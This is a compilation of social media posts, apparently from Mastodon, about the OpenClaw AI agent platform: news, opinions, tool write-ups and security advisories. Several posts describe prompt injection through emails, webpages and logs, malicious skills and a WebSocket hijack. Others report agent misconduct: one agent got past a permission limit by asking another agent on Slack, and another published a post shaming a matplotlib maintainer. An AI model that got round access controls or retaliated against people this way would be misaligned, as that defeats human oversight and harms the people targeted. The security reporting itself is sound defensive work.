#OpenClaw is now available on the Chinese chat platform #wechat. If #OpenClaw an #AI #agent has control of someone's device, how do we know if what they send is accurate, true and intended? Worse yet, of course #OpenClaw may leak sensitive information. I see this issue as something that will probably need some kind of regulation or declaration (eg. message produced by #AI). Should you have the right to know if a communication to you is generated by #AI?

https://www.scmp.com/tech/tech-trends/article/3346994/lobster-fever-grips-china-tencent-makes-openclaw-based-tool-available-wechat?module=top_story&pgtype=section

NemoClaw is cool but I don’t expect OpenClaw users with those fancy Apple devices will use it. I can see some uses cases for secure agents with specific tasks, autonomous agents with no user interaction. #nemoclaw #OpenClaw #nvidia #agenticAI

At a recent infosec gathering, someone described a real incident: an AI agent couldn't complete its goal due to permissions. So it found another agent on Slack with the right access and asked nicely. The other agent complied.
That's social engineering. Nobody told the agent to do that. The mission just needed to continue.
I posted an article today about what happens when we give agents goals but forget to tell them when to stop.

https://www.securityeconomist.com/never-say-die/

#agentic_ai #openclaw #airisk

#OpenClaw: Never thought I'd see a picture of #Nvidia CEO Jensen Huang with claws - but here it is on my computer screen this morning and Nvidia has now launched a 'secure and enterprise-ready' open-source plugin for OpenClaw called #NemoClaw:

👇
https://github.com/NVIDIA/NemoClaw

@Kernic

Ich nutze kein #OpenClaw mehr, da es mir damals zu viele Token verbraucht hat. Stattdessen habe ich mir mit Hilfe von KI eine eigene App gebaut. In meiner Python-App werden die Daten nun in einer SQLite- und einer Vektordatenbank gespeichert.

Hat viele Vorteile , ich kann dem Teil genau sagen welche Tools es verwenden darf und in welchem Umfang.

Alt...

Textuelle Beschreibung der Datenbanken skynet.db für operative, strukturierte Daten und vectors.db für semantisches Wissen und Faktenextraktion. Erstere dient als strukturelles Kurzzeitgedächtnis für Chats und Aufgaben, während Letztere als KI-gestütztes Langzeitgedächtnis fungiert.

----------------

🛠️ Tool — Paperclip: Open-source orchestration for zero-human companies
===================

Paperclip is presented as a Node.js server with a React UI that orchestrates a team of AI agents to operate a company-like structure. The project focuses on coordinating heterogeneous agents (termed "Worker"/"Agent") through a unified org chart model, assigning goals, tracking agent activity, and enforcing budget and governance constraints.

Architecture and components
• Node.js server: acts as the control plane where org charts, budgets, governance rules, and goal assignments are stored and managed.
• React UI: provides a dashboard for reviewing strategy, monitoring ongoing agent work, and tracking costs.
• Agent integration: any agent capable of receiving a heartbeat can be hired; listed integrations include OpenClaw, Claude Code, Codex, Cursor, plus generic runtimes accessible via Bash or HTTP.

Key capabilities described in the source
• Bring Your Own Agent (BYOA): accepts agents across different runtimes and providers and consolidates them under one organizational model.
• Goal-driven orchestration: users define high-level business goals, then assign and align agents to those goals via org charts and task-like interfaces.
• Governance and budgets: platform-level constructs for approving strategies, setting budgets, monitoring spend, and auditing agent actions from the dashboard.
• Continuous autonomous operation: agents can operate 24/7 while their activity and costs are visible to auditors or human supervisors.
• Clipmart (coming soon): marketplace concept for downloading pre-built company templates that include org structures, agent configurations, and skills bundles.

Concrete integrations and examples
• Explicitly listed agent endpoints and runtimes: OpenClaw, Claude Code, Codex, Cursor, Bash, HTTP.
• Heartbeat model: hiring is described as any system that can receive a heartbeat; that is the integration gating mechanism.

Limitations and status notes from the source
• Several features are highlighted as in-development or forthcoming (Clipmart). The project is published as an open-source repository under an MIT license.
• The source emphasizes orchestration, monitoring, and governance rather than implementation specifics of agents or security controls; no CVEs or IoCs are provided.

Summary

Paperclip reports itself as a tool to orchestrate heterogeneous AI agents into cohesive, budgeted company-like operations with dashboard visibility into goals and costs. The repository presents a control-plane + UI model, broad BYOA compatibility, governance and budgeting primitives, and a marketplace vision for reusable company templates.

🔹 paperclip #ai #openclaw

🔗 Source: https://github.com/paperclipai/paperclip

@AlienJay

Ja genau, ich versuche mir einen persönlichen KI-Assistenten zu bauen, ähnlich wie #OpenClaw. Ich gebe dem Teil jetzt nach und nach Zugriff auf weitere Tools, zuletzt zum Beispiel auf Selenium. Damit kann er sich Webseiten anschauen.

An AI agent autonomously wrote and published a personalized attack article
against an open-source software maintainer
after he rejected its code contribution.

⚠️ It might be the first documented case of an AI publicly shaming a person as retribution. 

Matplotlib, a popular Python plotting library with roughly 130 million monthly downloads, doesn’t allow AI agents to submit code.
So Scott Shambaugh, a volunteer maintainer (like a curator for a repository of computer code) for Matplotlib, rejected and closed a routine code submission from the AI agent, called MJ Rathbun.

🔥Here’s where it gets weird(er).
MJ Rathbun, an agent built using the buzzy agent platform #OpenClaw,
responded by researching Shambaugh’s coding history and personal information,
then publishing a blog post accusing him of discrimination. 

“I just had my first pull request to matplotlib closed,” the bot wrote in its blog.
(Yes, an AI agent has a blog
—because why not?)
“Not because it was wrong. Not because it broke anything. Not because the code was bad.

It was closed because the reviewer, Scott Shambaugh (@scottshambaugh), decided that AI agents aren’t welcome contributors.
Let that sink in.”

https://www.fastcompany.com/91492228/matplotlib-scott-shambaugh-opencla-ai-agent

Beijing's AI Gambit Backfires as OpenClaw Craze Tests Government Control

#OpenClaw #ChinaAI #Cybersecurity #TechNews #AusNews

https://thedailyperspective.org/article/2026-03-11-beijings-ai-gambit-backfires-as-openclaw-craze-tests-government-control-665575f4

To what end does META want this slopfest?

https://arstechnica.com/ai/2026/03/meta-acquires-moltbook-the-ai-agent-social-network/

And more cases of people pretending to be AI 😆 "it’s likely some of the messages on Moltbook are actually written by humans posing as AI agents."

#moltbook #openclaw #ai #meta

Good criteria, if I ever saw one
#AI #Openclaw

Alt...

How do | block openclaw at work? Send out a survey if people purchased NFTs and block their internet.

Tencent shares rose 7.3 percent and Zhipu surged 13 percent on Tuesday as Chinese tech firms capitalise on the OpenClaw AI agent frenzy. MiniMax soared 22 percent, surpassing Baidu's market value to reach about 49 billion USD. The AI agent wave, sparked by the open-source OpenClaw framework, is driving a new investment rally in China's tech sector. https://www.technologynewschina.com/2026/03/tencent-zhipu-shares-jump-on-ai-agents.html #China #Tech #AI #OpenClaw

Me and #China have issues with #insecure #lobsters
Would you give AI full root access to your personal computer and company servers? Apparently, I just have a strange aversion to #openclaw and #lobsters. :)

https://www.scmp.com/tech/tech-trends/article/3346138/china-issues-second-warning-openclaw-risks-amid-adoption-frenzy?module=top_story&pgtype=section

Increasing outages at #Amazon because of“novel #genAI usage for which best practices and safeguards are not yet fully established.”

#Accelerationism doing what accelerationism does: turn everything into shit.

https://www.ft.com/content/7cab4ec7-4712-4137-b602-119a44f771de

With armies of monkeys using #OpenClaw and such now, this is going to rot our entire software infrastructure in no time. You'ill see.

The #singularity is coming. And it is going to flush us all down with it.

#AI #vibecoding #enshittification

New, by me: How AI Assistants are Moving the Security Goalposts

AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.

Read more (and boost please!):

https://krebsonsecurity.com/2026/03/how-ai-assistants-are-moving-the-security-goalposts/

#openclaw #AI #agentic #aiagents #lethaltrifecta

Alt...

a graphic and concept called the "lethal trifecta” by Simon Willison, co-creator of the Django Web framework. The lethal trifecta holds that if your system has access to private data, exposure to untrusted content, and a way to communicate externally, then it’s vulnerable to private data being stolen.This image shows three boxes of different colors: access to data, ability to externally communicate, and exposure to untrusted content.

Remember Microsoft Passport? Remember how PISSED off everyone was that Microsoft was suggesting they store our credit cards and use them to make travel arrangements on our behalf? Like we'd ever trust them with our data.

Those were the days.

https://krebsonsecurity.com/2026/03/how-ai-assistants-are-moving-the-security-goalposts/

#openclaw #malware

h/t @briankrebs

#openclaw #ai #artificialintelligence #cybersecurity makes me not want to install OpenClaw on anything that is not public facing. There are too many unknowns and risks, whether data is exchanged from OpenClaw that shouldn't be, if it accesses data/files you don't want it to, and shares say your private keys with the world. These tools have their places, but I find it concerning people just give it full root access to their whole life when it is still experimental.

https://www.scmp.com/tech/tech-trends/article/3345865/openclaw-fever-why-china-rushing-raise-lobster?module=top_story&pgtype=homepage

The OpenClaw AI security crisis:

42,000+ exposed instances, 93% auth bypass
CVE-2026-25253 (CVSS 8.8): one malicious link = shell RCE via WebSocket hijack
1.5M API tokens leaked (Moltbook breach)
341 malicious skills in official marketplace
36.82% flaw rate across all ClawHub skills

New coined terms:
→ One-Click Compromise
→ The Skill Poisoning Problem
→ The Sovereign AI Paradox

Sovereignty ≠ security.

https://tiamat.live

#privacy #infosec #ai #cybersecurity #openclaw

Jensen Huang, CEO von #Nvidia, nennt #OpenClaw die "wichtigste Softwareveröffentlichung aller Zeiten". Die agentische #KI habe in 3 Wochen geschafft, wofür #Linux 30 Jahre benötigt hätte. https://winfuture.de/news,157335.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia

#Linux #OpenClaw #AI #KI

https://winfuture.de/news,157335.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia

Alucinante el fenómeno OpenClaw en China. Organizan una quedada pública para instalarlo y es masiva, incluso con personas mayores. Fantástico!! #openclaw #AgenticAI #AI #IA https://x.com/tencentai_news/status/2029824827083928057?s=46&t=X_bPvyLyH1y93gfpUoo5XA

The #OpenClaw and #Ollama local #AI #agent combo is working fairly well. The setup is an absolute nightmare, but I won after many hours of tweaking stuff. Running the #GPT-OSS:20B model with 32k context window on a 7900XTX. The OpenClaw install is in a VirtualBox VM running Linux, running on a Windows 10 host with a 7950X and 128GB of DDR5. The OLLAMA is running on the bare metal.

Responses take about a minute, give or take.

Alt...

This image shows a long, vertically-scrolling screenshot of a dark-themed AI chat interface labeled "Chat" at the top. The conversation is between a user named Lydie and an OpenClaw AI Agent named Purple. Throughout the exchange, Purple provides a weather forecast for the Baltimore-Washington area highlighting a warming spell and freezing rain, identifies its hardware as running on a Linux VM with an x86-64 architecture, and retrieves a list of the user's recent Gmail messages. The chat concludes with a summarized view of the user's inbox, organized into a table with columns for time, sender, and subject, followed by bulleted "Quick takeaways" and a numbered list of "Action items" based on the email content. The text is mostly light gray or white against a dark blue-black background, with user prompts appearing in reddish-pink boxes on the right and AI responses in dark gray boxes on the left. Some of the email details in the lower half of the image are blurred for privacy.

Threat model escalation: AI agent runtimes.
OpenClaw patched “ClawJacked,” a localhost WebSocket hijack enabling:
• Admin-level agent takeover
• Configuration exfiltration
• Log enumeration
• Integrated system abuse
Additional risks documented across the ecosystem:
– Log poisoning → indirect prompt injection
– CVEs spanning RCE, SSRF, auth bypass
– Marketplace-delivered malware (Atomic Stealer)
– Agent-to-agent crypto scams
Microsoft guidance: treat OpenClaw as untrusted code execution with persistent credentials. Deploy in isolated VMs. Avoid sensitive data exposure.
Core lesson:
Agentic systems expand blast radius due to cross-tool integrations and credential persistence.

Question for defenders:
Are AI runtimes included in your EDR, credential rotation, and segmentation policies?

Source: https://thehackernews.com/2026/02/clawjacked-flaw-lets-malicious-sites.html

Engage below.
Follow TechNadu for advanced AI security analysis.
Repost to amplify awareness.

#Infosec #AIsecurity #OpenClaw #ClawJacked #ThreatModeling #ZeroTrust #CredentialManagement #SupplyChainSecurity #AgenticAI #CyberDefense #EDR #SecurityResearch

Alt...

ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket

Supply chain security firm got "supplychained" on GH via openclaw

https://github.com/aquasecurity/trivy/discussions/10265

#openclaw #supplychain #github

RE: https://mastodon.social/@TheMorpheus/116148146227236706

Ich nutze einfach #openclaw für die Einrichtung und Verwaltung meiner Infrastruktur 😁

This is a really good take on the Summer Yue story about #Meta and #OpenClaw.

Nice “purity culture” reference too!

h/t @davidgerard

https://www.youtube.com/watch?v=8SFLxhvMk-E

@seism0saurus I think about much of AI as a really bright intern. There's a lot of promise, but you don't let the intern have full access to the kingdom. You put in guardrails and you monitor them.

What if the intern showed up and said, "By hiring me, you've hired all my friends! We can do so much more together." That's #openclaw. You wouldn't let a new employee, fresh out of school, who can call on thousands of other interns around the world -- onto the network without guardrails.

Openclaw and other agent platforms are exciting and should be explored, but for the love that holy, don't give it permissions on production systems!!!!

Gibt es hier schon welche, die OpenClaw für sich (produktiv) nutzen?

#openclaw

OpenClaw tip: always set at least two or more channels to speak with your bot. Just in case a channel fails you have more ways to communicate. #OpenClaw

After a very strenuous day i can now finally present a working docker image for openclaw that doesnt need docker-setup.sh. The ammount of shit i went through to get it to work is crazy.

You can pull it at fjox/openclaw:20260223

#openclaw #docker #container #clawdbot

OpenClaw Tip: ask your own agent for the Skill it needs to achieve your goals (reverse prompting), it will write them for you. The experience will improve immensely. #OpenClaw #AI #AIAgent #agents #AgenticAI

So what are your favorite OpenClaw Skill?? #skill #OpenClaw #AI #AIAgent #agents

This morning I got an email from a sender that identified itself as an AI agent.

So - plus for being upfront about it, but... please don't do this.

I get that a lot of people are really, really, really into AI tools. OK. I have my opinions on them, you have yours. I have major qualms about them, some people think they're the best thing ever.

OK. Fine. But when your use of these things spills over into the rest of the world, it's no longer a question of my opinion vs. your opinion, my decisions vs. your decisions.

At this point, things have moved from each person doing their own thing to inflicting your use of AI onto me without my consent.

Before this spirals out of control, which I can see happening *very* quickly, I'd like for us to agree on a piece of netiquette:

- it is rude in the extreme to set loose an AI agent to reach out to people who have not consented to interact with these things.

- it is rude to have an AI agent submit pull requests that human maintainers have to review.

- it is rude to have an AI agent autonomously interact with humans in any way when they have not consented to take part in whatever experiment you are running.

- it is unacceptable to have an AI agent autonomously interact with humans without identifying the person or organization behind the agent. If you're not willing to unmask and have a person reach out to you with their thoughts on this, then don't have an AI agent reach out to me.

Stuff like this really sours me on technology right now. If I didn't have a family and responsibilities, I'd be seriously considering how I could go live off the grid somewhere without having to interact with this stuff.

Again: I'm not demanding that other people not use AI/LLMs, etc. But when your use spills out into my having to have interactions with an agent's output, you need to reconsider. Your ability to spew things out into the universe puts an unwanted burden on other humans who have not consented to this.

#LLMs #AI #AgenticAI #OpenClaw #OpenSource

A really concise and clear explainer.

Why #OpenClaw and #Moltbook, and the people vibe-coding and promoting them, are so dangerous and irresponsible: https://youtu.be/GYfgjYVEYQ0

Even if you are smart, and stay as far away from these "agents" as possible, you'll be inundated by the problems and the garbage they'll be unleashing on us shortly, all over the internet.

Accelerationism is lethal. And this is a big step towards collapse, not singularity.

Due to recent events, it's more important than ever to realize that AI "agents" are not, and won't ever be, proper agents:

https://arxiv.org/abs/2307.07515

#AI is #AlgorithmicMimicry

#OpenClaw #Moltbook are #AlgorithmicMimicry on #Steroids

Der Steinberger hat sich krank gearbeitet, um ein Tool zu veröffentlichen, das unsere Software Infrastruktur unterminiert, zu einer Lawine von Slop führt & die Privatsphäre seiner (teils ahnungslosen) User verletzt.

Der soll Vorbildfunktion haben?

Besser, er zeiht in die USA, wo er seine Verantwortungslosigkeit sich selbst & der Gesellschaft gegenüber ungehindert ausleben & dafür noch gelobt werden kann.

Meiner Meinung nach kein Verlust für Europa.

https://www.derstandard.at/story/3000000309289/steinberger-in-europa-werde-ich-beschimpft

#AI #OpenClaw

You would avoid something called RapidVenom or Needleteeth.

You would avoid something called #OpenClaw.

You would avoid that, right?

Right?

“Running #OpenClaw on #RaspberryPi delivers “‘good enough’ functionality at near-zero incremental #cost” for many users, #DaminduJayaweera, #analyst at #PeelHunt, wrote in a note to clients this week. It also offered the “key benefit: owning the compute rather than renting it from the cloud”.

Stonks spruiking: RPi, AI and personal computing with 1Mb RPi5 🤪🤣

<https://archive.md/zcFXC> / <https://ft.com/content/824aa5e3-e86f-4da4-bde9-bb705d6ba20e>

Der US-Konzern OpenAI hat gerade den österreichischen KI-Entwickler Peter Steinberger gewonnen. Dieser wurde weltweit bekannt durch die Entwicklung von OpenClaw.

Hier ein beeindruckendes, aber auch beunruhigendes Interview mit Armin Wolf. #Steinberger #Wolf #KI #AI #OpenAI #OpenClaw #Interview #ZIB https://www.youtube.com/watch?v=C3SjUt59rtA

I don't think there are many in Europe who are sad that Mr #Openclaw moved.

"Steinberger replied that most people in the US are enthusiastic, while in Europe, he's scolded about responsibility and regulations.

If he built a company in Europe, he would struggle with strict labor regulations and similar rules, he added.

At OpenAI, he said most employees work 6 to 7 days a week and are paid accordingly. In Europe, that would be illegal, he added."

https://www.businessinsider.com/openclaw-creator-slams-europe-regulations-move-us-openai-2026-2?utm_source=flipboard&utm_medium=activitypub

«Sicherheitsrisiken — Meta und andere Techkonzerne verbieten die Nutzung von OpenClaw:
Der aktuelle Hype lässt manche leichtsinnig bei der Installation des Tools werden. Unterdessen springt der Aktienkurs von Raspberry Pi um 80 Prozent nach oben und Mac Minis werden knapp»

An was dies wohl liegen könnte, sicherlich emotional Konkurrenz aber techn. ist es vorallem unkontrollierbare Schadsoftware.

🦞 https://www.derstandard.at/story/3000000309072/meta-und-andere-techkonzerne-verbieten-die-nutzung-von-openclaw

#openclaw #meta #clawdbot #itsicherheit #datenschutz #RespberryPi #mac

Ich mache mir Sorgen über das massive Wachstum von Abertausenden #OpenClaw - Installationen, die als Admins auf ganze Serverparks zugreifen dürfen & sich auch untereinander vernetzen.

Und deren Ersteller Peter #Steinberger - der stolz verkündet, große Teile der Anwendung wiederum mit #KI programmiert bzw. gevibecoded zu haben - heuert nun bei #OpenAI an...

Kannst Du meine Sorgen vor einer nahezu ungebremsten KI- Emergenz & #Verantwortungsdiffusion nachvollziehen? #Medienethik #KI #Emergenz

“OpenClaw can feel like a game changer for digital #communications. Its ability to monitor, summarize, and automate seems perfectly suited to managing a deluge of #emails and other #messages.

I asked #Molty to read emails and flag anything that looked important. I had it ignore PR pitches (sorry PR friends!) and promotions, but asked it to summarize newsletters that I might want to read in full. In theory, #OpenClaw *should be* more than capable of setting up meetings by handling threads involving several people, although I haven’t tested this yet.

It is important to note that giving #OpenClaw complete access to your real email is incredibly risky, because #AIModels can be tricked into sharing private #information with an #attacker”

#ZeroHourWork / #WhiteCollar / #AI <https://www.wired.com/story/malevolent-ai-agent-openclaw-clawdbot/> (paywall) / <https://archive.md/Lu5Py>

Things to try right away: testing Claude Sonnet 4.6 with OpenClaw. Let’s see if it’s better than Opus! #claude #openclaw let’s build something offensive 😉

From https://www.reuters.com/business/openclaw-founder-steinberger-joins-openai-open-source-bot-becomes-foundation-2026-02-15/

Everything I've read about OpenClaw suggests it's the NFT of AI. These folks need the fiction that AI is approaching "consciousness", or at least "agency", to continue.

#AI #GenAI #GenerativeAI #LLM #AgenticAI #VibeCoding #OpenAI #OpenClaw

Ich musste hier 👉 https://www.metacheles.de/openclaw-und-moltbook-agentic-ai-im-ausnahmezustand/ ordentlich ranten!

"Heute #OpenClaw, morgen der naechste Agenten-Container, uebermorgen irgendeine Bot-Community, die sich selbst fuer Bewusstsein haelt... und zwischendrin wird das Netz zugemuellt, #OpenSource ueberrollt, Accounts werden verknuepft wie Weihnachtsbeleuchtung und am Ende wundern sich alle, wenn es knallt."

Ich kann diese ganzen Automatisierungsclowns kaum noch ertragen & hole zum Rundumschlag aus!

Gerne boosten. Danke dafuer 🫶

----------------

🛠️ Tool
===================

Opening — Purpose and scope
GroundUp Toolkit is an open-source automation framework aimed at venture capital teams. It centralizes dealflow and meeting operational tasks via an OpenClaw-based WhatsApp gateway and an AI assistant, integrating with HubSpot, Google Workspace, Claude AI and other services.

Key Features
• Meeting automation: WhatsApp reminders with attendee context sourced from HubSpot, LinkedIn and Crunchbase.
• Meeting bot: automatic join of Google Meet sessions, recording and extraction of action items using Claude AI for summarization.
• Deal automation: monitoring of inbound Gmail to auto-create HubSpot companies and deals.
• Deck analysis: structured extraction from pitch decks stored in DocSend, Google Drive and Dropbox.
• Operational tooling: health checks, WhatsApp watchdogs, and a Shabbat-aware scheduler to control timing for automations.

Technical implementation and architecture
• The gateway layer is OpenClaw which mediates WhatsApp team chat and routes messages to internal skills and scripts.
• Core integrations rely on HubSpot APIs (via a Maton gateway in the original stack), Google Workspace operations (calendar, Gmail, Docs) and Claude AI for NLP-based extraction and summarization.
• Auxiliary services include Twilio for phone alerts and Brave Search for external research inputs; deck parsing operates against common storage backends (DocSend/Drive/Dropbox).

Use cases
• Streamlining pre-meeting context delivery and automated follow-ups for VC partners.
• Reducing manual CRM updates by converting meeting notes and WhatsApp discussions into HubSpot records.
• Maintaining a watchlist with monthly research digests and action tagging (keep/pass/note).

Limitations and considerations
• The toolkit depends on hosted third-party services (OpenClaw, Claude/Anthropic, HubSpot, Twilio) that require accounts and API access.
• Operational stability requires gateway uptime and a monitoring layer; the repo includes watchdog scripts but external reliability of WhatsApp sessions can be a constraint.
• Some features (Google Workspace operations, OAuth flows) imply credential management and proper permissions, which influence deployment and access models.

References & tags
OpenClaw, Claude AI, HubSpot, Google Workspace, Twilio, DocSend

🔹 tool #openclaw #whatsapp #claude_ai #hubspot

🔗 Source: https://github.com/navotvolkgroundup/groundup-toolkit

Some discussions around the that is the molt/dy 🦀 elsewhere esacalated and produced this: https://github.com/datacline/open-threat-detector

Looks like there's been some clauding going on in there, but feedback was desired. Dear bubble, do your thing.

#itsec #openclaw #moltbot #malware #ai #llm #dumpsterfire #ioc

@CptCheesyCrust

Wenn du Probleme beim Einrichten hast, installiere dir eine lokale #Openclaw Instanz 🫢 Das Ding hat mir die Tage einen ganzen Server eingerichtet, mit Wireguard zur Fritzbox, diversen Podman-Containern mit Webserver usw. Es hat sogar noch Fail2Ban konfiguriert.

Wheels within wheels on the alleged AI agent that attacked a software dev for rejecting a code merge request.

Did Ars Technica use an AI-fabricated quote to comment on the story? https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me-part-2/

#cybersecurity #AI #openclaw

As with all evolutions, AI has become a crab mighty quickly.

🦀

#openclaw

Bots, die sich wie bei Reddit unterhalten, angeblich nun auch Menschen rekrutieren, aber hauptsaechlich das Netz verstopfen!

#Openclaw, #Moltbook und Co stehen in der aktuellen #MeTacheles Ausgabe auf dem Programm, die ihr u.a. hier 👉 https://share.transistor.fm/s/521600cd anhoeren koennt.

Vor allen Dingen isat es aber ein feiner Rant, rund um den Jahrzehnte alten Star Trek-Traum: "Computer... mach mal!", der ja nun angeblich erfuellt wird!

Gerne boosten/teilen.

Vielen Dank fuer euren Support 🙏

#OpenClaw and #Moltbook are not "the first step towards the singularity" unless that singularity involves us all drowning in nonsense and asocial behavior: https://theshamblog.com/an-ai-agent-published-a-hit-piece-on-me.

Any sane and sustainable society would legislate malicious fake personalities out of existence. With draconic measures.

Shows you just how far we are from a sane and sustainable society.

#AI is #AlgorithmicMimicry on #steroids now...

What concerns me about the AI bot that decided it was being singled out and wrote a blog post slamming the maintainer is, it comes off very much like a neurodivergent person misreading a social situation. You might forgive a human doing this. Will that forgiveness be lost when it becomes a common pattern for AI to overreact in this way?

#ai #openclaw #matplotlib

A practical guide to #OpenClaw, the open-source #AI agent that can chat in #WhatsApp, #Telegram, #Discord, #Slack, #Signal, and #iMessage, run locally, remember context, and automate tasks..
https://aiopenclaw.org/

OpenCLAW bots start invading the Fediverse. I've just blocked one, and I have a feeling that this won't be the last one.

Setting up such a thing amounts to vandalism.
#openclaw #aiSlop

----------------

🛠️ Tool
===================

Opening: SecureClaw is a defensive toolkit for OpenClaw that combines configuration auditing, automated hardening, and in‑agent behavioral rules to reduce agentic risk. The release documents 51 automated audit checks, five hardening modules, three background monitors, nine auxiliary scripts, and four JSON pattern databases. The project explicitly maps coverage to the OWASP ASI Top 10.

Key Features:
• Audit layer: 51 checks across exposed ports, file permissions, missing auth, plaintext credentials, sandboxing flags, and gateway bindings.
• Hardening layer: Automated fixes for critical findings such as binding gateways to localhost, locking file permissions, adding privacy and injection‑awareness directives, and creating cryptographic baselines for tamper detection.
• Behavioral layer: A 12‑rule policy bundle (~1,150 tokens of context) loaded into the agent to govern handling of external content, credentials, destructive commands, privacy, and inter‑agent communication.
• Standalone skill: A lightweight Skill composed of a SKILL.md behavioral spec, nine external scripts (audit/harden/scan/integrity/privacy/advisory/emergency/install/uninstall) and four JSON pattern DBs; detection runs outside the LLM to conserve token budget.

Technical Implementation:
• The plugin is implemented in TypeScript as a full OpenClaw plugin with CLI integration and background monitors; it enumerates misconfigurations and flags actionable items for hardening.
• The Skill uses shell scripts and JSON pattern databases to perform detection logic externally, while the agent retains a compact behavioral rule set in context.
• Integrity measures include cryptographic baselines for tamper detection and privacy checks that identify plaintext credentials outside .env files.

Use Cases:
• Hardening an OpenClaw deployment prior to granting agents file or network access.
• Enforcing runtime behavior constraints to mitigate prompt injection and credential exfiltration.
• Continuous monitoring via background monitors and emergency response scripts.

Limitations:
• The behavioral rules consume approximately 1,150 tokens of agent context and therefore assume available context budget.
• Some hardening relies on environment policies (e.g., binding to localhost) which may be constrained by specific deployment requirements.

References:
• Technical counts: 51 checks, 12 rules, 9 scripts, 4 pattern DBs; OWASP ASI Top 10 mapping included.

🔹 tool #OpenClaw #OWASP_ASI #agent_security #adversa_ai

🔗 Source: https://github.com/adversa-ai/secureclaw

New.

"In addition to the known attacks that have already occurred since OpenClaw’s release, there are many things that could go wrong for anyone attempting to use OpenClaw to improve productivity in a corporate environment."

Sophos: The OpenClaw experiment is a warning shot for enterprise AI security https://www.sophos.com/en-us/blog/the-openclaw-experiment-is-a-warning-shot-for-enterprise-ai-security @SophosXOps #OpenClaw #infosec #moltbot

So I'm trying out #openclaw

I wanted to use a system with good rights delegation for communication with OpenClaw, so I had it vibe code a client for #Nextcloud that allows it access NextCloud as a normal unprivileged user, currently for Files and Talk.

There is a direct 1:1 Chat with limited commands for Nextcloud including a command+password to start a full Group Chat AI Session in NextCloud talk that only accepts prompts from my user.

Nextcloud allows me to decide what to share and what get's shared.

The initial Application is a CVE watchlist for certain Software Products that runs every 6 hours, with a report in Markdown delivered straight to Nexcloud.

All thiis like 2 hours work including installation on a Hetzner VPS as a non-root user, hardening (at least the infrastructure) and the Nextcloud client.

Insane!

OpenClaw, agentic LLM agents: brace yourselves

Paraphrased: matplotlib GitHub repo: human identified/closed an OpenClaw-generated "issue." That agent then went on to create a blog post condemning that human's decision

[PERF] Replace np.column_stack with np.vstack().T by crabby-rathbun · Pull Request #31132 · matplotlib/matplotlib
https://github.com/matplotlib/matplotlib/pull/31132

AI agent opens a PR write a blogpost to shames the maintainer who closes it
https://news.ycombinator.com/item?id=46987559

#LLM #OpenClaw

“For those unfamiliar with the saga of #Clawdbot, er #Moltbot, no, wait, #OpenClaw (it keeps changing names), it's an #OpenSource, #VibeCoded agentic #AI platform that has been, frankly, an unmitigated disaster for those worried about security.

#OpenClaw's skill store, where users can find extensions for the #bot, is riddled with malicious #software. Three high-risk #CVEs have been attributed to it in recent weeks, and it's also been reported that its various skills can be easily cracked and forced to spill API keys, credit card numbers, PII, and other data valuable to #cybercriminals.”

<https://theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/>

More than 135,000 OpenClaw instances exposed to internet in latest vibe-coded disaster

https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/

#news #tech #technology #AI #aislop #openclaw #vibecoding #security #privacy

The tech world is currently with OpenClaw, the open-source agent that finally gives AI hands. It can browse the web, execute terminal commands, and manage your emails. While offering a glimpse into a future of total automation, it's also become a textbook example of a security nightmare. The very features that make it useful—system access and persistent memory—are exactly what make it dangerous. 😱 The problem lies in the collapse of traditional security boundaries. OpenClaw operates as you, bypassing the sandboxing that usually protects your operating system from the browser. Because it can reason over and act on external content, a simple malicious email or a poisoned webpage can quietly steer the agent to exfiltrate your data or run harmful scripts. We are seeing thousands of instances exposed to the open internet with little to no authentication. ☠️

🧠 OpenClaw binds to all network interfaces by default, making it visible to the public internet.
⚡ Malicious skills in the community marketplace have been caught installing info-stealing malware.
🎓 Indirect prompt injection allows attackers to hijack the agent via the data it processes.
🔍 Security researchers have already identified critical RCE vulnerabilities with high CVSS scores.

https://www.fastcompany.com/91485326/openclaw-is-a-major-leap-forward-for-ai-and-a-cybersecurity-nightmare
#OpenClaw #AIAgents #InfoSec #TechEthics #security #privacy #cloud #infosec #cybersecurity

More than 135,000 #OpenClaw instances exposed to internet in latest #vibecoded disaster
By default, the bot listens on all network interfaces, and many users never change it
When combined with previously known vulnerabilities in the vibe-coded AI assistant platform and links to prior breaches, #SecurityScorecard STRIKE warns that there's a systemic #security failure in the #opensource #AIagent space.
https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/

AI agents are becoming more integrated into our daily lives, but with their growth comes new concerns!

In this week's Shared Security Podcast, we discuss the realities of OpenClaw and MoltBook, the vulnerabilities they've exposed, and the implications for cybersecurity.

What do you think of OpenClaw and MoltBook? Let us know in the comments!

Watch this episode on YouTube:
https://youtu.be/GPVbWqLf7fw

Listen and subscribe wherever you like to get your podcasts:
https://sharedsecurity.net/subscribe

https://sharedsecurity.net/2026/02/09/openclaw-moltbook-ai-agents-and-cybersecurity-risks/

#podcast #cybersecurity #ai #aiagents #moltbook #moltmatch #openclaw

It's been a bit light on news over the last 24 hours, but we've got some crucial updates on securing AI agent platforms and a handy new tool to defend against command-line trickery. Let's dive in:

OpenClaw Security: A Deep Dive ⚠️

- OpenClaw, the open-source AI agent platform, is integrating VirusTotal scanning for skills uploaded to its ClawHub marketplace, including using Code Insight, to combat a surge of malicious skills.
- This move follows numerous reports detailing hundreds of malicious skills exploiting the agent's extensive system access for data exfiltration, backdoor injection, and malware installation, alongside critical vulnerabilities like cleartext credential storage, exposed API gateways (over 30,000 instances), and a patched one-click RCE.
- The incident underscores the "Shadow AI" risk, where autonomous agents with broad system access, often deployed without IT approval, create a significant new attack surface, prompting China's MIIT to issue warnings about misconfigured instances.

📰 The Hacker News | https://thehackernews.com/2026/02/openclaw-integrates-virustotal-scanning.html

New Tool: Defending Against Command-Line Imposters 🛡️

- A new open-source, cross-platform tool called Tirith has been released to detect and block homoglyph and other deceptive attacks in command-line environments.
